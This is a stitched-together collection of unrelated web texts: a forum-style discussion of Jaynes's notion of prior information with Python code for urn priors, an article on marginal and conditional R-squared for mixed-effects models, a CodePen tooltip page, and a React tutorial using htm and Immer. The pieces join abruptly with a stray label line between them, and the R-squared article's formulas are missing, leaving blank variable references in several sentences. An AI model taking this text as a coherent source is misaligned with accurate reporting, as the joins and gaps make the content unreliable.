X is the misleadingly-named ‘prior information’, which represents all the information available other than the specific data D that we are considering at the moment. “This includes, at the very least, all it’s past experiences, from the time it left the factory to the time it received its current problem.” --Jaynes p.87, referring to a hypothetical problem-solving robot. It seems to me that in practice, X ends up being a representation of a subset of all prior experience, attempting to discard only what is irrelevant to the problem. In real human practice, that representation may be wrong and may need to be corrected.
“ ... to our robot, there is no such thing as an ‘absolute’ probability; all probabilities are necessarily conditional on X at the least.” “Any probability P(A|X) which is conditional on X alone is called a prior probability. But we caution that ‘prior’ ... does not necessarily mean ‘earlier in time’ ... the distinction is purely a logical one; any information beyond the immediate data D of the current problem is by definition ‘prior information’.”
“Indeed, the separation of the totality of the evidence into two components called ‘data’ and ‘prior information’ is an arbitrary choice made by us, only for our convenience in organizing a chain of inferences.” Please note his use of the word ‘evidence’.
Sampling theory, which is the basis of many treatments of probability, “ ... did not need to take any particular note of the prior information X, because all probabilities were conditional on H, and so we could suppose implicitly that the general verbal prior information defining the problem was included in H. This is the habit of notation that we have slipped into, which has obscured the unified nature of all inference.”
“From the start, it has seemed clear how one how one determines numerical values of of sampling probabilities¹ [e.g. P(D|H) ], but not what determines prior probabilities [AKA ‘priors’ e.g. P(H|X)]. In the present work we shall see that this s only an artifact of the unsymmetrical way of formulating problems, which left them ill-posed. One could see clearly how to assign sampling probabilities because the hypothesis H was stated very specifically; had the prior information X been specified equally well, it would have been equally clear how to assign prior probabilities.”
Jaynes never gives up on that X notation (though the letter may differ), he never drops it for convenience.
“When we look at these problems on a sufficiently fundamental level and realize how careful one must be to specify prior information before we have a well-posed problem, it becomes clear that ... exactly the same principles are needed to assign either sampling probabilities or prior probabilities ...” That is, P(H|X) should be calculated. Keep your copy of Kendall and Stuart handy.
I think priors should not be cheaply set from an opinion, whim, or wish. “ ... it would be a big mistake to think of X as standing for some hidden major premise, or some universally valid proposition about Nature.”
The prior information has impact beyond setting prior probabilities (priors). It informs the formulation of the hypotheses, of the model, and of “alternative hypotheses” that come to mind when the data seem to be showing something really strange. For example, data that seems to strongly support psychokinesis may cause a skeptic to bring up a hypothesis of fraud, whereas a career psychic researcher may not do so. (see Jaynes pp.122-125)
I say, be alert for misinformation, biases, and wishful thinking in your X. Discard everything that is not evidence.
I’m pretty sure the free version Probability Theory: The Logic of Science is off line. You can preview the book here: http://books.google.com/books?id=tTN4HuUNXjgC&printsec=frontcover&dq=Probability+Theory:+The+Logic+of+Science&cd=1#v=onepage&q&f=false .
Also see the Unofficial Errata and Commentary for E. T. Jaynes’s Probability Theory: The Logic of Science
SEE ALSO
FOOTNOTES
1. There are massive compendiums of methods for sampling distributions, such as
• Feller (An Introduction to Probability Theory and its Applications, Vol1, J. Wiley & Sons, New York, 3rd edn 1968 and Vol 2. J. Wiley & Sons, New York, 2nd edn 1971) and Kendall and
• Stuart (The Advanced Theory of Statistics: Volume 1, Distribution Theory, McMillan, New York 1977).
** Be familiar with what is in them.
Edited 05/05/2010 to put in the actual references.
Edited 05/19/2010 to put in SEE ALSO
Then the task is just to turn this new distribution into a computer program, which turns out not to be difficult.
Can someone please provide a hint how?
Here's some Python code to calculate a prior distribution from a rule for assigning probability to the next observation.
A "rule" is represented as a function that takes as a first argument the next observation (like "R") and as a second argument all previous observations (a string like "RRWR"). I included some example rules at the end.
EDIT: oh man, what happened to my line spacing? my indents? jeez.
EDIT2: here's a dropbox link: https://www.dropbox.com/s/16n01acrauf8h7g/prior_producer.py
from functools import reduce
def prod(sequence):
'''Product equivalent of python's "sum"'''
return reduce(lambda a, b: a*b, sequence)
def sequence_prob(rule, sequence):
'''Probability of a sequence like "RRWR" using the given rule for
computing the probability of the next observation.
To put it another way: computes the joint probability mass function.'''
return prod([rule(sequence[i], sequence[:i]) \
for i in range(len(sequence))])
def number2sequence(number, length):
'''Convert a number like 5 into a sequence like WWRWR.
The sequence corresponds to the binary digit representation of the
number: 5 --> 00101 --> WWRWR
This is convenient for listing all sequences of a given length.'''
binary_representation = bin(number)[2:]
seq_end = binary_representation.replace('1', 'R').replace('0', 'W')
if len(seq_end) > length:
raise ValueError('no sequence of length {} with number {}'\
.format(length, number))
# Now add W's to the beginning to make it the right length -
# like adding 0's to the beginning of a binary number
return ''.join('W' for i in range(length - len(seq_end))) + seq_end
def prior(rule, n):
'''Generate a joint probability distribution from the given rule over
all sequences of length n. Doesn't feed the rule any background
knowledge, so it's a prior distribution.'''
sequences = [number2sequence(i, n) for i in range(2**n)]
return [(seq, sequence_prob(rule, seq)) for seq in sequences]
And here's some examples of functions that can be used as the "rule" arguments.
def laplaces_rule(next, past):
R = past.count('R')
W = past.count('W')
if R + W != len(past):
raise ValueError('knowledge is not just of red and white balls')
red_prob = (R + 1)/(R + W + 2)
if next == 'R':
return red_prob
elif next == 'W':
return 1 - red_prob
else:
raise ValueError('can only predict whether next will be red or white')
def antilaplaces_rule(next, past):
return 1 - laplaces_rule(next, past)
So just to be clear. There are two things, the prior probability, which is the value P(H|I), and the back ground information which is 'I'. So P(H|D,I_1) is different from P(H|D,I_2) because they are updates using the same data and the same hypothesis, but with different partial background information, they are both however posterior probabilities. And the priors P(H_I_1) may be equal to P(H|I_2) even if I_1 and I_2 are radically different and produce updates in opposite directions given the same data. P(H|I) is still called the prior probability, but it is smething very differnet from the background information which is essentially just I.
Is this right? Let me be more specific.
Let's say my prior information is case1, then P( second ball is R| first ball is R & case1) = 4/9
If my prior information was case2, then P( second ball is R| first ball is R & case2) = 2/3 [by the rule of succession]
and P( first ball is R| case1) = 50% = P( first ball is R|case2)
This is why different prior information can make you learn in different directions, even if two prior informations produce the same prior probability?
Please let me know if i am making any sort of mistake. Or if I got it right, either way.
No really, i really want help. Please help me understand if I am confused, and settle my anxiety if I am not confused.
You got it right. The three different cases correspond to different joint distributions over sequences of outcomes. Prior information that one of the cases obtains amounts to picking one of these distributions (of course, one can also have weighted combinations of these distributions if there is uncertainty about which case obtains). It turns out that in this example, if you add together the probabilities of all the sequences that have a red ball in the second position, you will get 0.5 for each of the three distributions. So equal prior probabilities. But even though the terms sum to 0.5 in all three cases, the individual terms will not be the same. For instance, prior information of case 1 would assign a different probability to RRRRR (0.004) than prior information of case 2 (0.031).
So the prior information is a joint distribution over sequences of outcomes, while the prior probability of the hypothesis is (in this example at least) a marginal distribution calculated from this joint distribution. Since multiple joint distributions can give you the same marginal distribution for some random variable, different prior information can correspond to the same prior probability.
When you restrict attention to those sequences that have a red ball in the first position, and now add together the (appropriately renormalized) joint probabilities of sequences with a red ball in the second position, you don't get the same number with all three distributions. This corresponds to the fact that the three distributions are associated with different learning rules.
One can update one's beliefs about one's existing beliefs and the ways in which one learns from experience too – click.
[-][anonymous]8y 0
Under standard assumptions about the drawing process, you only need 10 numbers, not 1024: P(the urn initially contained ten white balls), P(the urn initially contained nine white balls and one red one), P(the urn initially contained eight white balls and two red ones), and so on through P(one white ball and nine red ones). (P(ten red balls) equals 1 minus everything else.) P(RWRWWRWRWW) is then P(4R, 6W) divided by the appropriate binomial coefficient.
So then this initial probability estimate, 0.5, is not repeat not a "prior".
This really confuses me. Considering the Universe in your example, which consists only of the urn with the balls, wouldn't one of the prior hypotheses(e.g. case 2) be a prior and have all the necessary information to compute the lookup table?
In other words aren't the three following equivalent in the urn-with-balls universe?
1. Hypothesis 2 + bayesian updating
2. Python program 2
3. The lookup table generated from program 2 + Procedure for calculating conditional probability(e.g. if you want to know the probability that the third ball is red, given that the first two balls drawn were white.)
Unless I am misunderstanding you, yes, that's precisely the point.
I don't understand why you are confused, though. None of these are, after all, numbers in (0,1), which would not contain any information as to how you would go about doing your updates given more evidence.
|
__label__pos
| 0.964616 |
R-Squared for Mixed Effects Models
by guest
By Kim Love
When learning about linear models —that is, regression, ANOVA, and similar techniques—we are taught to calculate an R2. The R2 has the following useful properties:
• The range is limited to [0,1], so we can easily judge how relatively large it is.
• It is standardized, meaning its value does not depend on the scale of the variables involved in the analysis.
• The interpretation is pretty clear: It is the proportion of variability in the outcome that can be explained by the independent variables in the model.
The calculation of the R2 is also intuitive, once you understand the concepts of variance and prediction. One way to write the formula for R2 from a GLM is
where is an actual individual outcome, is the model-predicted outcome that goes with it, and is the average of all the outcomes.
In this formula, the denominator measures all of the variability in without considering the model. The numerator E ach in the numerator represents how much closer the model’s predicted value gets us to the actual outcome than the mean does. Therefore, the fraction is the proportion of all of the variability in the outcome that is explained by the model.
The key to the neatness of this formula is that there are only two sources of variability in a linear model: the fixed effects (“explainable”) and the rest of it, which we often call error (“unexplainable”).
When we try to move to more complicated models, however, defining and agreeing on an R2 becomes more difficult. That is especially true with mixed effects models, where there is more than one source of variability (one or more random effects, plus residuals).
These issues, and a solution that many analysis now refer to, are presented in the 2012 article A general and simple method for obtaining R2 from generalized linear mixed‐effects models by Nakagawa and Shielzeth (see https://besjournals.onlinelibrary.wiley.com/doi/full/10.1111/j.2041-210x.2012.00261.x). These authors present two different options for calculating a mixed-effects R2, which they call the “marginal” and “conditional” R2.
Before describing these formulas, let’s borrow an example study from the Analysis Factor’s workshop “Introduction to Generalized Linear Mixed Models.” Suppose we are trying to predict the weight of a chick, based on its diet and number of days since hatching. Each chick in the data was weighed on multiple days, producing multiple outcomes for a single chick.
This analysis needs to account for the following sources of variability: the “fixed” effects of diet and time, the differences across the chicks (which we would call “random” because the chicks are randomly selected), and the prediction errors that occur when we try to use the model to predict a chick’s exact weight based on its diet and days since hatching.
The marginal R2 for LMMs described by Nakagawa and Shielzeth is calculated by
where is the variance of the fixed effects , is the variance of the random effect and is the variance of the model residuals . In the context of the chick example, is the variability explained by diet and days since hatching, is the variance attributed to differences across chicks, and is the variability of the errors in individual weight predictions. Together, these three sources of variability add up to the total variability (denominator of the marginal R2 equation). Dividing the variance of the fixed effects only by this total variability provides us with a measure of the proportion of variability explained by the fixed effects.
However, this leads to a question: is the fixed effects part of the model the only part that is “explained?” Or is the variation across the chicks, which we have been calling “random,” now also “explained?” For those who would claim that random variability is explained, because it has been separated from residual variability, we calculate the conditional R2 for LMMs:
The conditional R2 is the proportion of total variance explained through both fixed and random effects.
The article by Nakagawa and Shielzeth goes on to expand these formulas to situations with more than one random variable, and also to the generalized linear mixed effects model (GLMM).
The GLMM versions should be interpreted with the same caution we use with a pseudo R2 from a more basic generalized linear model. Concepts like “residual variability” do not have the same meaning in GLMMs. The article also discusses the advantages and limitations of each of these formulas, and compares their usefulness to other earlier versions of mixed effects R2 calculations.
Note that these versions of R2 are becoming more common, but are not entirely agreed upon or standard. You will not be able to calculate them directly in standard software. Instead, you need to calculate the components and program the calculation. Importantly, if you choose to report one or both of them, you should not only identify which one you are using, but provide some brief interpretation and a citation of the article.
What is GLMM and When Should You Use It?
When you have multilevel or repeated data and normality just isn't happening, you may need GLMM. Get started learning Generalized Linear Mixed Models and when and how to apply them to your data.
Leave a Comment
Please note that, due to the large number of comments submitted, any comments on problems related to a personal study/project will not be answered. We suggest joining Statistically Speaking, where you have access to a private forum and more resources 24/7.
Previous post:
Next post:
|
__label__pos
| 0.594619 |
Pen Settings
HTML
CSS
CSS Base
Vendor Prefixing
Add External Stylesheets/Pens
Any URLs added here will be added as <link>s in order, and before the CSS in the editor. You can use the CSS from another Pen by using its URL and the proper URL extension.
+ add another resource
JavaScript
Babel includes JSX processing.
Add External Scripts/Pens
Any URL's added here will be added as <script>s in order, and run before the JavaScript in the editor. You can use the URL of any other Pen and it will include the JavaScript from that Pen.
+ add another resource
Packages
Add Packages
Search for and use JavaScript packages from npm here. By selecting a package, an import statement will be added to the top of the JavaScript editor for this package.
Behavior
Auto Save
If active, Pens will autosave every 30 seconds after being saved once.
Auto-Updating Preview
If enabled, the preview panel updates automatically as you code. If disabled, use the "Run" button to update.
Format on Save
If enabled, your code will be formatted when you actively save your Pen. Note: your code becomes un-folded during formatting.
Editor Settings
Code Indentation
Want to change your Syntax Highlighting theme, Fonts and more?
Visit your global Editor Settings.
HTML
<h1><span>Bubble Point</span> Tooltips</h1>
<p>Pellentesque habitant morbi tristique <a href="#" title="I ❤ ">senectus</a> et netus et malesuada fames ac <a href="#" title="Hi, I'm a tooltip thingy.">turpis</a> egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat <a href="#" title="Ooooh<br>Look at me<br>I'm a fancy tooltip">eleifend</a> leo.</p>
!
CSS
.tooltip,
.arrow:after {
background: black;
border: 2px solid white;
}
.tooltip {
pointer-events: none;
opacity: 0;
display: inline-block;
position: absolute;
padding: 10px 20px;
color: white;
border-radius: 20px;
margin-top: 20px;
text-align: center;
font: bold 14px "Helvetica Neue", Sans-Serif;
font-stretch: condensed;
text-decoration: none;
text-transform: uppercase;
box-shadow: 0 0 7px black;
}
.arrow {
width: 70px;
height: 16px;
overflow: hidden;
position: absolute;
left: 50%;
margin-left: -35px;
bottom: -16px;
}
.arrow:after {
content: "";
position: absolute;
left: 20px;
top: -20px;
width: 25px;
height: 25px;
box-shadow: 6px 5px 9px -9px black, 5px 6px 9px -9px black;
transform: rotate(45deg);
}
.tooltip.active {
opacity: 1;
margin-top: 5px;
transition: all 0.2s ease;
}
.tooltip.out {
opacity: 0;
margin-top: -20px;
}
h1 {
font-size: 32px;
font-family: "Helvetica Neue", Sans-Serif;
font-stretch: condensed;
text-transform: uppercase;
}
h1 span {
display: inline-block;
padding: 10px 20px;
background: black;
border: 2px solid white;
color: white;
border-radius: 20px;
margin-top: 20px;
text-align: center;
text-decoration: none;
box-shadow: 0 0 7px black;
}
body {
padding: 30px;
background: #bada55;
}
!
JS
// IIFE to ensure safe use of $
(function( $ ) {
// Create plugin
$.fn.tooltips = function(el) {
var $tooltip,
$body = $('body'),
$el;
// Ensure chaining works
return this.each(function(i, el) {
$el = $(el).attr("data-tooltip", i);
// Make DIV and append to page
var $tooltip = $('<div class="tooltip" data-tooltip="' + i + '">' + $el.attr('title') + '<div class="arrow"></div></div>').appendTo("body");
// Position right away, so first appearance is smooth
var linkPosition = $el.position();
$tooltip.css({
top: linkPosition.top - $tooltip.outerHeight() - 13,
left: linkPosition.left - ($tooltip.width()/2)
});
$el
// Get rid of yellow box popup
.removeAttr("title")
// Mouseenter
.hover(function() {
$el = $(this);
$tooltip = $('div[data-tooltip=' + $el.data('tooltip') + ']');
// Reposition tooltip, in case of page movement e.g. screen resize
var linkPosition = $el.position();
$tooltip.css({
top: linkPosition.top - $tooltip.outerHeight() - 13,
left: linkPosition.left - ($tooltip.width()/2)
});
// Adding class handles animation through CSS
$tooltip.addClass("active");
// Mouseleave
}, function() {
$el = $(this);
// Temporary class for same-direction fadeout
$tooltip = $('div[data-tooltip=' + $el.data('tooltip') + ']').addClass("out");
// Remove all classes
setTimeout(function() {
$tooltip.removeClass("active").removeClass("out");
}, 300);
});
});
}
})(jQuery);
$("a[title]").tooltips();
!
999px
Console
|
__label__pos
| 0.785643 |
Black lives matter
Portrait Dr. Axel Rauschmayer
Dr. Axel Rauschmayer
Homepage | Twitter
Cover of book “JavaScript for impatient programmers”
Book, exercises, quizzes
(free to read online)
Cover of book “Deep JavaScript”
Book (50% free online)
Cover of book “Tackling TypeScript”
Book (first part free online)
Logo of newsletter “ES.next news”
Newsletter (free)
Minimal React: getting started with the frontend library
[2020-08-25] dev, javascript, frontend, react
(Ad, please don’t block)
This blog post explains how to get started with React while using as few libraries as possible.
Table of contents:
Required knowledge
Things you should know before reading this blog post:
• JavaScript: You should have already written code in that language.
• Browser DOM (document object model): It helps if you are loosely familiar with how the DOM represents HTML and how it handles events.
• npm: It also helps if you have a basic understanding of the npm package manager for Node.js.
About this blog post
Many tutorials provide comprehensive introductions to the React ecosystem. I wanted to try something different:
What is the smallest set of libraries that allows you to be productive in React?
This is an exhaustive list of the npm packages that the code in this blog post depends on:
The repository
The repository minimal-react contains the examples that we are exploring in this blog post:
• You can try out the examples online.
• You can install it locally to play with the complete setup. Everything is installed inside a single directory, so it’s easy to remove later on.
• However, installing the repository is not required for following this blog post. All relevant data is quoted inside the post.
The repository has the following structure:
• minimal-react/
• html/: HTML files
• js/: JavaScript code
• README.md: Instructions for installing and running the project
• package.json: Configuring the npm package manager
• snowpack.config.json: Configuring the Snowpack build tool
package.json specifies the npm packages that the JavaScript code depends on:
"devDependencies": {
"@snowpack/plugin-react-refresh": "^2.1.0",
"snowpack": "^2.9.0"
},
"dependencies": {
"htm": "^3.0.4",
"immer": "^7.0.7",
"react": "^16.13.1",
"react-dom": "^16.13.1"
}
package.json also defines two scripts:
"scripts": {
"start": "snowpack dev",
"build": "snowpack build"
},
These are executed via:
• Starting the development web server: npm run start
• Abbreviated: npm start
• Creating a standalone application (that runs without the development server): npm run build
What is React?
React is a library for creating user interfaces in web browsers. Before we take a look at how it works, let us remind ourselves how user interfaces are created if they are based on a traditional model-view-controller approach.
The traditional model-view-controller (MVC) approach
This object-oriented approach gets its name from three roles that objects play in it:
• The model is the data to be accessed via the graphical user interface.
• The view displays the model.
• The controller reacts to events (actions by the user) and updates model and view accordingly.
Traditional MVC-based user interfaces work as follows:
• A tree of user interface components is created once.
• Each user interface component manages its own state and updates it incrementally, in response to user interactions.
• “Glue code” that is external to the user interface components, propagates state changes between them.
This approach has downsides:
• The user interface logic is often scattered across the code.
• Cross-component changes are difficult to implement.
• It’s easy to introduce inconsistencies because there can be many different combinations of states.
React
React works differently:
• The user interface is encoded as a tree-shaped data structure. It is called virtual DOM, due to its similarity with the document object model (DOM) used by browsers to represent HTML.
• There is a single (nested) model for the complete user interface.
• A user interface component is simply a function that maps a model to a user interface.
• The root component has as input the whole model and passes on parts of that model to subcomponents (which are also functions).
• When the user interacts with the user interface, the model is changed accordingly and the complete user interface is recreated (by invoking the root component again).
• To make this viable, performance-wise, React compares the virtual DOM returned by the root component with the current browser DOM. It only changes the latter where the former differs.
Benefits of this approach:
• It’s easier to understand the user interface logic.
• Cross-component dependencies are easier to implement.
• The data flow is simpler: always from the top of the user interface component tree to its bottom.
First example: counting clicks
The first example is in the file minimal-react/html/counting-clicks.html.
Adding the user interface to the HTML page
This is the body of the HTML page:
<h1>Counting clicks</h1>
<div id="root"></div>
<script type="module" src="../js/counting-clicks.js"></script>
This is how minimal-react/js/counting-clicks.js adds its user interface to the web page:
import ReactDOM from 'react-dom';
import {html} from 'htm/react';
import {useState} from 'react';
// ···
ReactDOM.render(
html`<${CountingClicks} rootModel=${rootModel} />`, // (A)
document.getElementById('root')); // (B)
• Line A is how we create user interface elements (via the virtual DOM). Read on for more information.
• Line B is the HTML element in which React creates the user interface.
Creating user interface elements
Consider the following syntax from the previous example:
html`<${CountingClicks} rootModel=${rootModel} />`
There are two layers to this syntax.
Syntactic layer 1: tagged templates
html`···` is a tagged template. Tagged templates are a JavaScript language feature that lets us embed foreign syntax in JavaScript code. Each tagged template is actually a function call – for example:
const numberOfFruits = 4;
const nameOfFruits = 'strawberries';
const result = someFunc`I have ${numberOfFruits} ${nameOfFruits}!`;
The the last line is equivalent to:
const result = someFunc(['I have ', ' ', '!'], numberOfFruits, nameOfFruits);
Tag functions such as someFunc() can return arbitrary values and are usually guided by their input. In this case, the input is:
• The template strings ['I have ', ' ', '!'] are static (the same each time this particular function call is made)
• The substitutions numberOfFruits and nameOfFruits are dynamic (possibly different each time this particular function call is made)
Substitutions are inserted “into” the template via the syntax ${···}.
The tag function html supports React’s syntax for creating virtual DOM elements. It parses its input to produce its output.
Syntactic layer 2: JSX, React’s syntax for creating virtual DOM elements
JSX is a non-standard JavaScript language feature introduced by React. It lets us use HTML-ish expressions to create virtual DOM data. JSX must be compiled to standard JavaScript and is supported by several compilers – for example:
• Babel:
• Input: modern and/or future JavaScript
• Output: current or older JavaScript
• TypeScript:
• Input: JavaScript plus static type information (roughly, a superset of JavaScript)
• Output: current or older JavaScript
In this tutorial, we use a tagged template instead of JSX, which has the benefit that we can use plain JavaScript (no compilation is necessary). There are only minor differences between html syntax and JSX, which is why I’ll occasionally use the name JSX for the former.
There are two kinds of elements.
React components
First, the name of an element can be a function whose name starts with an uppercase letter:
html`<${UiComponent} arg1="abc" arg2=${123} />`
This expression is equivalent to:
React.createElement(UiComponent, { arg1: "abc", arg2: 123 })
In this case, React.createElement() makes the following function call:
UiComponent({ arg1: "abc", arg2: 123 })
Virtual DOM elements
Second, the name of an element can also be a string that starts with a lowercase letter:
html`<div arg1="abc" arg2=${123} />`
This expression is equivalent to:
React.createElement("div", { arg1: "abc", arg2: 123 })
In this case, React.createElement() directly creates virtual DOM data.
JSX in action
Let’s go back to the initial code:
html`<${CountingClicks} rootModel=${rootModel} />`
What is happening here?
We are invoking the component CountingClicks (a function) and pass it a single parameter, whose label is rootModel. This is what the root model looks like:
const rootModel = {
numberOfClicks: 0,
};
The component CountingClicks()
The component is implemented as follows:
function CountingClicks({rootModel: initialRootModel}) {
const [rootModel, setRootModel] = useState(initialRootModel); // (A)
return html`
<div>
<a href="" onClick=${handleIncrement}>
Number of clicks: ${rootModel.numberOfClicks}</a>
<p />
<button onClick=${handleReset}>Reset</button>
</div>
`;
function handleIncrement(event) {
// ···
}
function handleReset(event) {
// ···
}
}
The component returns a single virtual DOM element, a <div>. We use the ${···} syntax to insert values into the returned data:
• The click event handler handleIncrement
• The number rootModel.numberOfClicks
• The click event handler handleReset
Handling state via the useState hook
The function call useState() in line A adds reactivity to our code:
• rootModel is the current model data (the M in MVC).
• initialRootModel is the initial value of rootModel.
• setRootModel can be used to change rootModel. Whenever we do that, React automatically reruns the CountingClicks component so that the user interface always reflects what’s in the model.
Never mind how exactly React does this! There is a ton of magic going on behind the scenes. Therefore, it is better to think of useState() as a language mechanism rather than as a function call. useState() and other similar functions are called hooks because they let us hook into React’s API.
Handling click events
Clicks on the <a> element are handled by the following function:
function handleIncrement(event) {
event.preventDefault(); // (A)
const nextRootModel = { // (B)
numberOfClicks: rootModel.numberOfClicks + 1,
};
setRootModel(nextRootModel); // (C)
}
If a user clicks on an <a> element that has the attribute href, then, by default, the browser goes to the location specified by the attribute. The method call in line A prevents that from happening.
In line B, we create a new root model. We don’t change the existing model, we create a modified copy of it. Non-destructively updating data is a best practice in React. It avoids several problems.
In line C, we use the setter created by the useState() hook to make nextRootModel the new root model. As mentioned before, setRootModel() will also recreate the complete user interface by invoking CountingClicks() again.
Clicks on the <button> are handled by the following function:
function handleReset(event) {
const nextRootModel = {
numberOfClicks: 0,
};
setRootModel(nextRootModel);
}
This time, we don’t need to prevent a default action. We again create a new root model and activate it via setRootModel().
Second example: expandable sections
The second example is in the file minimal-react/html/expandable-sections.html.
Entry point
This time, the entry point of the JavaScript code looks like this:
ReactDOM.render(
html`<${Sections} sections=${addUiProperties(sections)} />`,
document.getElementById('root'));
The initial root model is:
const sections = [
{
title: 'Introduction',
body: 'In this section, we are taking a first look at the ideas are covered by this document.',
},
// ···
];
Function addUiProperties() adds a single user-interface-related property to the root model:
function addUiProperties(sections) {
return sections.map((section) => ({
...section,
expanded: false,
}));
}
We use spreading (...) to copy each element of the Array sections while adding the new property expanded. Once again, we are not modifying the original data, we are updating it non-destructively.
User interface component Sections()
This is the root user interface component of the current example:
function Sections({sections: initialSections}) {
const [sections, setSections] = useState(initialSections);
return sections.map((section, index) => html`
<!--(A)-->
<${Section} key=${index}
sections=${sections} setSections=${setSections}
section=${section} sectionIndex=${index} />
`);
}
We again use the useState() hook to manage the model.
This time, the component returns an Array of virtual DOM elements (that are created by the subcomponent Section()). Note the key attribute in line A. Whenever we use an Array as virtual DOM data, each of the elements must have a unique key. The idea is that React can more efficiently update the browser’s DOM if each Array element has a unique identity. For example, if we only rearrange the elements but don’t otherwise change them, then React only needs to rearrange browser DOM nodes.
User interface component Section()
This is the component for a single section:
function Section({sections, setSections, section, sectionIndex}) {
return html`
<div style=${{marginBottom: '1em'}}> <!--(A)-->
<h3>
<a href="" style=${{textDecoration: 'none'}} onClick=${handleClick.bind(undefined, sectionIndex)}> <!--(B)-->
${section.expanded ? '▼ ' : '▶︎ '} <!--(C)-->
${section.title}
</a>
</h3>
${
!section.expanded // (D)
? null
: html`
<div>
${section.body}
</div>
`
}
</div>
`;
function handleClick(sectionIndex, event) { // (E)
event.preventDefault();
setSections(expandExactlyOneSection(sections, sectionIndex));
}
}
Using CSS in React components
In line A, we are specifying CSS via an object literal:
• CSS property names such as margin-bottom are translated to JavaScript identifiers such as marginBottom.
• CSS property values are specified via strings.
React’s rules for whitespace
In line C, we are using ${···} to insert a string into the user interface. JSX handles whitespace differently from HTML: Whitespace between lines is completely ignored. That’s why there is a space after each triangle.
Why does JSX do that? We can see the benefit in line B: The opening <a> tag can be on its own line and no space is inserted between that tag and the text in the next line.
Conditional evaluation
In line D, we are evaluating a condition:
• If the condition is true, we don’t insert anything into the user interface (as indicated by the special value null).
• If the condition is false, we insert virtual DOM data into the user interface.
Handling clicks
In line E, we are dealing with clicks on the triangle:
• First, we prevent the browser’s default action.
• Next, we change the model of the root component via setSections() (which was passed to Section() via a parameter). That leads to the user interface being re-rendered.
Function expandExactlyOneSection() non-destructively updates sections so that only the section is expanded whose index is sectionIndex.
Exercises
• Add numbers to the sections.
• Change the code so that more than one section can be open at the same time.
• You’ll need to change and rename expandExactlyOneSection().
Third example: quiz
The third example is in the file minimal-react/html/quiz.html.
The model
This is the data that encodes quiz entries. Each entry has a question and zero or more answers:
const entries = [
{
question: 'When was JavaScript created?',
answers: [
{text: '1984', correct: false},
{text: '1995', correct: true},
{text: '2001', correct: false},
],
},
// ···
];
Immer
This time, we use the library Immer to help us with non-destructively updating data. It works as follows:
import produce from 'immer';
const updatedData = produce(originalData, (draftData) => {
// Modify draftData destructively here...
});
We provide the Immer function produce() with the data to be updated, originalData and a callback. The callback destructively changes its parameter draftData so that it has the desired shape. It treats draftData as if it were originalData, but the former is actually a special object: Immer observes the operations that are performed on it. They tell Immer how to create a modified copy of originalData.
The following function uses Immer to add two user interface properties to entries:
• Property .open is added to each entry (line A).
• Property .checked is added to each answer (line B).
function addUiProperties(entries) {
return produce(entries, (draftEntries) => {
for (const entry of draftEntries) {
entry.open = true; // (A)
for (const answer of entry.answers) {
answer.checked = false; // (B)
}
}
});
}
If we handled the non-destructive updating ourselves, addUiProperties() would look as follows:
function addUiProperties(entries) {
return entries.map((entry) => ({
...entry, // (A)
open: true,
answers: entry.answers.map((answer) => ({
...answer, // (B)
checked: false,
}))
}));
}
In line A, we copy entry via spreading (...) while adding the new property .open and overriding the existing property .answers (whose value we need to copy).
We can see that the Immer-based code is simpler, but not much. As we’ll see soon, Immer especially shines with deeply nested data.
The root controller pattern
This is how the root component Quiz is rendered into the HTML page:
ReactDOM.render(
html`<${Quiz} entries=${addUiProperties(entries)} />`,
document.getElementById('root'));
The root component Quiz knows the complete model (the result of addUiProperties(entries)). Each of its subcomponents receives part of the root model and a reference to a so-called root controller, which is an instance of the following class:
class RootController {
constructor(entries, setEntries) {
this.entries = entries;
this.setEntries = setEntries;
}
setAnswerChecked(entryIndex, answerIndex, checked) {
const newEntries = produce(this.entries, (draftEntries) => { // (A)
draftEntries[entryIndex].answers[answerIndex].checked = checked;
});
this.setEntries(newEntries); // refresh user interface
}
closeEntry(entryIndex) {
const newEntries = produce(this.entries, (draftEntries) => { // (B)
draftEntries[entryIndex].open = false;
});
this.setEntries(newEntries); // refresh user interface
}
}
Whenever a user interaction happens in one of the subcomponents of Quiz, that subcomponent asks the root controller to change the root model accordingly. After the change, the root controller calls this.setEntries (which originally was created via the useState() hook) and the whole user interface is recreated.
The root controller having access to the whole model has one considerable benefit: It’s easy to manage cross-component changes.
In line A and line B, we used Immer to non-destructively update this.entries. This time, the code is much simpler than without Immer.
I call the pattern of passing a root controller object to all user interface components the root controller pattern.
The user interface components
The root component Quiz
This is the implementation of the root component:
function Quiz({entries: initialEntries}) {
const [entries, setEntries] = useState(initialEntries);
const root = new RootController(entries, setEntries);
return html`
<${React.Fragment}> <!--(A)-->
<h1>Quiz</h1>
<${AllEntries} root=${root} entries=${entries} />
<hr />
<${Summary} entries=${entries} />
<//>
`;
}
A React component must return valid virtual DOM data. Valid data is:
• A single virtual DOM element
• A boolean, a number, or a string
• null (which produces zero output)
• An Array where each element is valid virtual DOM data
In line A, we use the special component React.Fragment to return multiple elements. This works better than an Array because conceptually, Array elements tend to be similar in nature and produced via iteration. And with an Array, we would have to specify key attributes.
Quiz has two subcomponents: AllEntries and Summary.
The component AllEntries
Each quiz entry is initially open – the user can check and uncheck answers as desired. Once they submit the answers they think are correct, the entry is closed. Now they can’t change the selected answers anymore and the quiz app lets them know if they got their answers right or not.
function AllEntries({root, entries}) {
return entries.map((entry, index) => {
const entryKind = entry.open ? OpenEntry : ClosedEntry;
return html`
<${entryKind} key=${index} root=${root} entryIndex=${index} entry=${entry} />`
});
}
The component OpenEntry
The component OpenEntry displays entries that are open:
function OpenEntry({root, entryIndex, entry}) {
return html`
<div>
<h2>${entry.question}</h2>
${
entry.answers.map((answer, index) => html`
<${OpenAnswer} key=${index} root=${root}
entryIndex=${entryIndex} answerIndex=${index} answer=${answer} />
`)
}
<p><button onClick=${handleClick}>Submit answers</button></p> <!--(A)-->
</div>`;
function handleClick(event) {
event.preventDefault();
root.closeEntry(entryIndex);
}
}
function OpenAnswer({root, entryIndex, answerIndex, answer}) {
return html`
<div>
<label>
<input type="checkbox" checked=${answer.checked} onChange=${handleChange} />
${' ' + answer.text}
</label>
</div>
`;
function handleChange(_event) { // (B)
// Toggle the checkbox
root.setAnswerChecked(entryIndex, answerIndex, !answer.checked);
}
}
With an open entry, we can submit our answers via a button (line A). Note how the click handler handleClick() uses the root controller instance in root to change the model and to refresh the user interface.
We also refresh the complete user interface whenever the user changes a checkbox (line B).
The component ClosedEntry
The component ClosedEntry displays entries that are closed:
